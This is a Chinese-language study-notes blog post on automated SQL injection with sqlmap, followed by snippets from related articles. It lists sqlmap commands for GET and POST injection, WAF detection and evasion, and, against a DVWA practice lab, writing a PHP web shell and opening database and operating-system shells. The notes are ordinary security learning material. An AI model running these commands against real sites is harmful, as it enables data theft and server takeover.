安全学习笔记day9-sql注入之自动化注入

最新推荐文章于 2025-06-11 11:55:01 发布
最新推荐文章于 2025-06-11 11:55:01 发布
阅读量475 收藏 2
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/sx234com/article/details/80349604
本文详细介绍SQLMap工具的基础使用方法及高级技巧,包括GET与POST注入、混淆注入、代理注入等,并提供提权操作实例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0、内容有三(sqlmap,Havij-胡萝卜,Pangolin-穿山甲)

一、sqlmap提纲



二、学习顺序:



三、基本信息


1、GET方式注入

A、语法


基本:sqlmap -u url 后面可以跟 -f -p(当参数只有一个的时候没必要使用-p但是如果是多个参数时候例如username=aaa&pwd=aaaa时候 可以指定 -p username或者 -p pwd 或者不指定 也可) --users(用户信息) --banner(各个版本信息) --dbs(数据库信息) --all(全部信息罪毒辣) 

2、POST方法注入


基本语法:

sqlmap -r 保存的post头信息文件 

例如 : sqlmap -r post.txt

另外一种方法,带参数

A、带cookie的 sqlmap -u url --cookie="xxxx"

B、带data的    sqlmap -u url --data="username=admin&password=123456"


3、混淆注入

知识结构


语法:

检测对方waf : sqlmap -u url --identify-waf

绕过对方waf: 

sqlmap -u url --skip-waf --random-agent 通过使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile 通过手机请求 使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile --level 3 risk=2 提高安全/危险等级 通过手机请求 使用随机agent

sqlmap -u url --skip-waf --random-agent --mobile --smart  smart智能模式

sqlmap -u url --skip-waf --random-agent --mobile --smart  --offline  减少根对方的交互

4、代理注入:


5、高级注入:


上图语法使用 或者

sqlmap -u url --level=3 --risk=3


6、数据获取




7、提权操作


语句范例:

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --file-write="../shell.php" --file-dest="tmp/shell.php"


sqlshell:

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --sql-shell  数据库shell

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --os-shell  操作系统shell

sqlmap -u http://192.168.56.103/dvwa/vulnerabilities/sqli/?id=23&Submit=Submit --cmd-shell  cmdshell




sx234com
关注
2025年的网络安全领域充满机遇和挑战,系统化的学习路线了解一下
网络技术联盟站
06-30 71
在数字化浪潮席卷全球的2025年,网络安全已成为企业和个人的核心关切。数据泄露、勒索软件、供应链攻击频发,网络安全人才需求激增,薪资水平持续攀升。无论你是想转行进入网络安全领域的新手,还是希望深造的从业者,一条清晰、系统的学习路线都至关重要。本文将为你提供一份2025年网络安全学习路线,涵盖从基础知识到高级技能的完整路径,结合最新的行业趋势和实战建议,助你在网络安全领域脱颖而出。适合零基础学习者、进阶者以及职业规划者。
Day66:WEB攻防-Java安全&SPEL表达式&SSTI模版注入&XXE&JDBC&MyBatis注入
2301_82257383的博客
04-26 512
MyBatis支持两种参数符号,一种是#,另一种是KaTeX parse error: Expected 'EOF', got '#' at position 4: ,**#̲使用预编译,使用拼接SQL。(造成注入原因也是因为使用了$进行拼接)**:由于使用#{}会将对象转成字符串,形成order by “user” desc造成错误,因此很多研发会采用${}来解决,从而造成注入这个SQL语句的目的是将0x7e以及当前用户的用户名插入到指定的XML字段中,从而执行恶意操作或泄露敏感信息。
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2958
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
SQL注入15】自动化注入技术(基于sqlmap工具和sqli-labs-less1靶场平台)
Fighting_hawk的博客
02-22 4688
1. SQLMAP很自动化,能极大提高工作效率; 2. 掌握SQLMAP的常用命令; 3. 通过SQLMAP自动化运行过程代码,加深对注入原理的理解。
高效检测 SQL 注入漏洞,自动化实战经验分享,从零基础到精通,收藏这篇就够了!
最新发布
A1_3_9_7的博客
06-11 732
总的来说,这个手搓的 SQL 注入检测工具还有很大的提升空间。和 SQLmap 相比,在检测的全面性上还有差距。不过,自己动手丰衣足食,未来还会不断优化,让它在实战中发挥更大的作用。
Sqlmap(SQL注入自动化工具)
F2444790591的博客
07-16 4299
自动化SQL注入工具Sqlmap
[网络安全学习篇55]:SQL自动化注入
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-01 2646
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我...
自动化SQL注入工具-sqlmap
u013008898的博客
01-05 1580
1.通过burpsuite.获取拦截到的请求,指定文件进行探测 python sqlmap.py -r target.txt --current-db 2.通过url地址进行探测 Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" (-u参数指定目标注入地址)检测出存在可利用漏洞。 探测参数 1.列出所有的...
2020/2/19学习笔记-day01
01-20
【Java学习笔记-day01】 Java是一门广泛应用于软件开发的高级编程语言,自1995年诞生以来,经历了多次版本更新,逐渐发展成为现代软件工程的重要支柱。本篇笔记主要介绍了Java学习的一些基础知识,包括XML、面向...
崔希凡javaweb笔记day08-day13
11-09
崔希凡老师的javaweb笔记涵盖了从day08到day13的重要学习内容,这是传智播客官网上一套详尽的视频教程的配套资料。这些笔记和源码旨在帮助学员深入理解JavaWeb开发的核心技术,提升编程技能。以下是根据这些天的笔记...
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWA、Pikachu)
ISNS的博客
04-21 1776
最近和同学聊天: 是我太菜。
Havij1.14 SQL注入工具 asp php jsp mssql mysql
04-09
老外的一个很NB的SQL注入工具.手法很特殊.
havij 萝卜注入工具
06-12
havij 萝卜注入工具
胡萝卜主题蔬菜网站模板
11-23
胡萝卜主题蔬菜网站模板是一款html5模板,适合水果蔬菜类网站模板下载。
SQL自动注入详细入门笔记(Sqlmap)
陆总的博客
09-02 1045
SQL注入笔记 【目标:】拿到表中登录用户账号密码; 【注意:】全过程中,sql语句中的单引号都应该是英文下的单引号;需要提前准备好DVWA环境,可参考https://www.cnblogs.com/sevenbug/p/11417100.html; 入口 检测能否进行sql注入:输入单引号,点击提交报错 使用参数1’ or 1=1;#进行注入可以得到当前表下所有信息 可以通过1' or 1=1 order by 2;# (或9、8、7、6。。。依次尝试)判断出查询范围的字..
SQL注入自动化原理(盲注)
学生
05-25 543
SQL注入自动化原理(盲注) 11/23/2020 雨 寒风刺骨 今天一下午都在研究bool盲注 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 可使用burp suite进行fuzzing测试 测试哪些函数被过滤 布尔型:页面只返回True和False两种类型页面。利用页面返回不同,逐个
10 个 SQL 注入工具(非常详细)零基础入门到精通,收藏这一篇就够了
leah126的博客
05-09 5726
其主要的目标是在存在着漏洞的数据库服务器上提供一个远程的外壳,甚至在一个有着严格的防范措施的环境中也能如此。Havij不仅能够自动挖掘可利用的SQL 查询,还能够识别后台数据库类型、检索数据的用户名和密码hash、转储表和列、从数据库中提取数据,甚至访问底层文件系统和执行系统命令,当然前提是有 一个可利用的SQL注入漏洞。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
浅谈Sql注入总结笔记整理(超详细)
baimaozi008的博客
06-16 1565
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息,在实战和测试中,难免会遇见到一些sql注入,下面,我将总结一些常用sql注入中的不同姿势。
基于PHPCMS的SQL注入(Havij)
未名编程
07-17 2362
本教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险。 目录实验目的实验环境实验原理实验步骤第一步靶机操作第二步渗透主机操作实验总结 实验目的 通过本实验理解SQL注入基本原理和过程,掌握菜刀和Havij等注入工具的使用方法,了解SQL注入的危害。通过本实验,掌握SQL注入点识别方法、测试方法、自动化工具使用方法以及进行防御的基本方法。 实验环境 测试渗透机:win2k8SvrTester 工具:中国菜刀、Havij 目标服务器(靶机):phpcms网站 目标网站:http://IP:80.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值